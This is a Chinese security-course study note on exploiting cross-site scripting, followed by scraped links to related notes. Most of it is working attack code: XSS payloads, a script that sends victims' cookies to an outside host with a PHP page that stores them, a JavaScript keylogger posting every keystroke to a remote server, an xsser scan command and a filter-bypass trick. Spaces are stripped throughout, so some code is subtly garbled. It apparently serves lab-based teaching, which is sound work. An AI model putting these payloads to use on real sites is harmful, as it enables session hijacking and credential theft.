【安全牛学习笔记】XSS的利用

反射型XSS1.概念

通过社会工程学等手段诱骗用户点击某个精心构造的链接,该链接会将恶意的js代码提交给
有漏洞的服务器网站,并由服务器返回给受害者的客户端执行。

2.POC

-<script>alert(‘xss’)</script>
-直接通过脚本插入
-<ahref=‘‘onclick=alert(‘xss‘)>type</a>
-将代码注入到a标签中,点击超链接则执行-<imgsrc=http://1.1.1.1/a.ipgonerror=alert(‘xss‘)>
-将代码注入到img标签中,加载出错时执行-<script>window.location=‘http://1.1.1.1‘</script>
-重定向
-<iframeSRC="http://1.1.1.1/victim"height="0"width="0"></iframe>
-加载一个宽和高都是0的框架来执行代码-<script>newImage().src="http://1.1.1.1/c.php?output="+document.cookie;</script>
-窃取cookie并发送到指定网址-<script>document.body.innerHTML="<divstyle=visibility:visible;><h1>THISWEBSITE

ISUNDERATTACK</h1></div>";</script>
-修改DOM树中的内容

3.窃取cookiejs代码 cookie.js

varimg=newImage();
img.src="http://1.1.1.1/cookies.php?cookie="+document.cookie;

接收页面代码cookies.php

<?php
$c=$_GET[‘c‘];
$cookie=fopen("cookie.txt","a");
fwrite($cookie,$c."\r\n\r\n");
fclose($cookie);
echo"success"
?>

恶意代码

<scriptsrc=http://1.1.1.1/cookie.js></script>

攻击过程:

当恶意代码被执行时,会从外部网址读取cookie.js在客户端上执行,该js会读取当前页面的
地址并发送到指定的接收页面,由页面接收并保存到文件。

4.keylogger键盘记录js keylogger.js

document.onkeypress=function(evt){
evt=evt||window.event
key=String.fromCharCode(evt.charCode)
if(key){
varhttp=newXMLHttpRequest();
varparam=encodeURI(key)
http.open("POST","http://192.168.20.8/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);

}
}

接收页面 Keylogger.php

<?php
$key=$_POST[‘key‘];
$logfile="keylog.txt";
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>

恶意代码

<script+src="http://1.1.1.1/keylogger.js"></script>

攻击过程:当恶意代码被执行时,会从外部网址读取keylooger.js在客户端上执行,该js记录所有该页面
上的按键操作并发送到指定的接收页面,由页面接收并保存到文件。

5.xss漏洞检测工具:xsser

xsser-u“http://1.1.1.1/dvwa/vulnerabilities/"-g"xss_r/?name="--cookie="securi
ty=low;PHPSESSID=d23e469411707ff8210717e67c521a81"-s-v--reverse-check检测xss漏洞
--heuristic检查被过滤的字符

6.过滤绕过

过滤机制:替换<script>字符为""绕过方法:在<script>中嵌套一层<script>--<scr<script>ipt>

存储型XSS1.概念

将恶意js代码永久的存储在有漏洞的服务器上,每次受害者打开该页面时,恶意代码便会在
客户端执行。

2.表单长度限制突破只在客户端过滤且服务器没有很的过滤机制时:

  直接修改客户端源码改变表单长度
  通过截断代理直接在数据包中修改需要提交的内容
时间: 2024-10-05 11:52:45

【安全牛学习笔记】XSS的利用的相关文章

【安全牛学习笔记】CSRF

╋━━━━━━━━━━━━━━━━━━━━━━━╋ ┃CSRF                                          ┃ ┃Cross-site request forgery                    ┃ ┃与XSS经常混淆                                 ┃ ┃从信任的角度来区分                            ┃ ┃    XSS:利用用户对站点的信任                 ┃ ┃  

【Spring学习笔记-MVC-5】利用spring MVC框架,实现ajax异步请求以及json数据的返回

作者:ssslinppp      时间:2015年5月26日 15:32:51 1. 摘要 本文讲解如何利用spring MVC框架,实现ajax异步请求以及json数据的返回. Spring MVC与json参考文章:[spring学习笔记-mvc-3]返回json数据-方式1  和 [spring学习笔记-mvc-4]返回json数据-方式2. 使用到的技术主要如下: Ajax:使用JQuery 提供的ajax:==>需要引入jquery.min.js文件: Spring MVC: Jso

【安全牛学习笔记】利用配置不当提权

┃利用漏洞提权 ┃Ubuntu11.10 ┃http://old-releases.ubuntu.com/releases/11.10/ ┃gcc ┃sudo apt-cdrom add && sudo apt-get install gcc ┃gcc 18411.c -o exp ┃CVE-2012-0056 ┃/proc/pid/mem ┃kernels >=2.6.39 ┃http://blog.zx2c4.com/749 [email protected]:~# search

【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段

XSS 攻击WEB客户端 客户端脚本语言 弹窗警告.广告 Javascript 在浏览器中执行 XSS(cross-site scripting) 通过WEB站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的 注入客户端脚本代码 盗取cookie 重定向 VBScript,ActiveX,or Flash XSS JavaScript 与Java语言无关 命令完全出于市场原因 使用最广的客户端脚本语言 使用场景 直接嵌入html:<script>aler('XSS');</scr

【安全牛学习笔记】XSS- 键盘记录器和反射型XSS

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS                                                                                                                                             ┃ ┃Keylogger.js                                              

【安全牛学习笔记】XSS的简述

1.Cross Site SCripting 攻击者往Web页面里插入恶意Script代码,当用户浏览该页时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的. 2.xss漏洞类型 反射型 存储型DOM型 3.用途 键盘记录 盗取cookie重定向 等 4.脚本语言javascipt AcetiveX5.使用场景 -直接嵌入html<script>alert('x');</script> -元素标签时间 <bodyonload=alert('x')&g

【安全牛学习笔记】&#8203;SQLMAP- 自动注入

SQLMAP自动注入 开源sql注入漏洞检测.利用工具 检测动态页面中get/post参数.cookie.http头 数据榨取 文件系统访问 操作系统命令执行 引擎强大.特性丰富 Xss漏洞检测 ------------------------------------------------------------------------------ 低安全代码 <?php if (isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id

【安全牛学习笔记】w3af

w3af Web applicaiton Attack and Audit Framework,基于python语言开发 此框架的目标是帮助你发现和利用所有WEB应用程序漏洞 9大类近plugin audit infrastructure grep evasion mangle auth bruteforce outpput crawl W3af 安装(kali自带版本执行扫描时挂死) cd ~ apt-get update apt-get install -y python-pip w3af

【安全牛学习笔记】

弱点扫描 ╋━━━━━━━━━━━━━━━━━━━━╋ ┃发现弱点                                ┃ ┃发现漏洞                                ┃ ┃  基于端口五福扫描结果版本信息(速度慢)┃ ┃  搜索已公开的漏洞数据库(数量大)      ┃ ┃  使用弱点扫描器实现漏洞管理            ┃ ╋━━━━━━━━━━━━━━━━━━━━╋ [email protected]:~# searchsploit Usage: